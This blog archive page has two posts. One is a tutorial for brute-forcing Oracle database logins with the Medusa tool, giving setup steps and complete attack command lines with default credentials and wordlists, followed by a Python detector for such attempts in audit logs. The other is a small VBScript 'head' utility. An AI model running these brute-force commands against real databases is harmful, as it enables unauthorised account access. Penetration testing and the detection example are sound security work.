Archive for January, 2010

Brute forcing Oracle with Medusa

While I think Hydra is a great tool, it always seems to be a little flaky to me and I totally agree with the foofus guys that I doubt Hydra is always doing its job. So about a year ago I was testing some Oracle dbs and needed a “working” bruteforcer and came across Medusa. Since using Medusa I have stopped using Hydra because it seems to handle many more protocols and services than Hydra ever actually supported.
The instructions are on the wiki but I thought I would list them out here too.
Download Medusa from foofus.net. Do the standard

./configure --prefix=/stickit/whereever ; make; make install

If running Gentoo you can install the Pentoo Overlay and emerge Medusa that way.
You will also need the following packages. Here are the ebuilds in Gentoo’s portage.

app-admin/eselect-oracle
dev-db/oracle-instantclient-basic
dev-db/oracle-instantclient-sqlplus

Then to prep Medusa for Oracle support you need to get all your annoying environment variables set and install DBD::Oracle

export ORACLE_HOME=/usr/lib/oracle/10.2.0.3/client
export LD_PATH=/usr/lib/oracle/10.2.0.3/client/lib
export C_INCLUDE_PATH=/usr/lib/oracle/10.2.0.3/client/include/
export LD_LIBRARY_PATH=/usr/lib/oracle/10.2.0.3/client/lib
perl -MCPAN -e shell
install DBD::Oracle

DBD::Oracle installation failed for me so I did the following

cd ~/.cpan/build/DBD-Oracle-*
perl Makefile.PL
make install

As of version 1.5 the oracle.pl script needs to be adjusted
…/medusa-1.5/src/modsrc/wrapper/oracle.pl – modify line 50 to be:

my $msg = "", $err = 0;

Then to run Medusa using specific creds, like OUTLN/OUTLN try something like

./medusa -M wrapper -h 192.168.0.1 -u OUTLN -p OUTLN -m TYPE:STDIN -m PROG:/usr/src/compiled/medusa-1.5/lib/medusa/modules/oracle.pl -m ARGS:"%H %U DatabaseSIDnameHere"

To have it read in a list of users and a dictionary try something like

./medusa -M wrapper -h 192.168.0.1 -U /tmp/ora-users.txt -P /tmp/bigdict.txt -t 3 -r 1 -f -F -O /tmp/medusa-oracle-output -v 6 -m TYPE:STDIN -m PROG:/usr/src/compiled/medusa-1.5/lib/medusa/modules/oracle.pl -m ARGS:"%H %U DatabaseSIDnameHere"

I have noticed sometimes you need to throttle Medusa a little so the db can properly respond before you throw another attempt at it.
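
From the defender's side, a dictionary run like the one above shows up in Oracle's session audit trail as a burst of ORA-01017 failures from one client host, even when throttled. The following is an added example, not part of the original post, that flags such a burst and any account that logs on right after failing. It assumes session auditing is enabled and that rows were exported from DBA_AUDIT_SESSION as CSV; the sample rows, host names and thresholds are constructed.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

FAILED = 1017  # ORA-01017: invalid username/password; 0 means successful logon

# Constructed sample rows (not from the original post), assumed to be a CSV
# export of DBA_AUDIT_SESSION: TIMESTAMP, USERHOST, USERNAME, RETURNCODE.
SAMPLE = """\
2010-01-12 10:00:01,appsrv01,APPUSER,0
2010-01-12 10:00:05,scanbox,OUTLN,1017
2010-01-12 10:00:09,scanbox,OUTLN,1017
2010-01-12 10:00:14,scanbox,REPORTS,1017
2010-01-12 10:00:18,scanbox,REPORTS,1017
2010-01-12 10:00:23,scanbox,BATCH,1017
2010-01-12 10:00:27,scanbox,BATCH,0
2010-01-12 10:03:00,appsrv01,APPUSER,1017
2010-01-12 10:03:10,appsrv01,APPUSER,0
"""

def parse(text):
    """Yield (timestamp, host, username, returncode) tuples from the CSV text."""
    for line in text.strip().splitlines():
        ts, host, user, rc = line.split(",")
        yield datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), host, user, int(rc)

def find_guessing(rows, window=timedelta(minutes=5), threshold=5):
    """Flag hosts with >= threshold failed logons inside a sliding window."""
    recent = defaultdict(deque)  # host -> failure timestamps inside the window
    tried = defaultdict(set)     # host -> usernames that failed at least once
    flagged = {}                 # host -> accounts that logged on after failing
    for ts, host, user, rc in sorted(rows):
        fails = recent[host]
        while fails and ts - fails[0] > window:
            fails.popleft()      # drop failures older than the window
        if rc == FAILED:
            fails.append(ts)
            tried[host].add(user)
            if len(fails) >= threshold:
                flagged.setdefault(host, [])
        elif rc == 0 and host in flagged and user in tried[host]:
            flagged[host].append(user)  # a guess probably succeeded
    return {h: {"tried": sorted(tried[h]), "guessed": g}
            for h, g in flagged.items()}

if __name__ == "__main__":
    for host, info in find_guessing(parse(SAMPLE)).items():
        print(host, "tried:", info["tried"], "guessed:", info["guessed"])
```

A wide window matters here: attempts spaced a few seconds apart stay under a short per-second rate limit but still accumulate within five minutes.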


Head Command for Windows

I was looking for a way to do a head in Windows and didn’t want to use any third-party software and of course, it had to be on the command line. So like head I needed it to show X number of lines from the beginning. I don’t know VBScript, so I am sure there is a better/cleaner way to write this but here is what I came up with. If anyone knows an easier way please pass it on.

' head.vbs: print the first N lines of a text file
If WScript.Arguments.Count = 2 Then
    FileName = WScript.Arguments.Item(0)
    ' Convert the count from its string argument form to an integer
    NumLines = CInt(WScript.Arguments.Item(1))
Else
    WScript.Echo "Usage: cscript.exe head.vbs filename NumberOfLines"
    WScript.Quit
End If

Const ForReading = 1

Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFile = objFSO.OpenTextFile(FileName, ForReading)

Dim i
For i = 1 To NumLines
    ' Stop early if the file has fewer lines than requested
    If objFile.AtEndOfStream Then Exit For
    WScript.Echo objFile.ReadLine
Next

objFile.Close

C:\dumps>type test.txt
line 1
line 2
line 3
line 4
line 5
line 6
line 7
line 8
line 9
line 10
line 11
C:\dumps>cscript //nologo head.vbs test.txt 8
line 1
line 2
line 3
line 4
line 5
line 6
line 7
line 8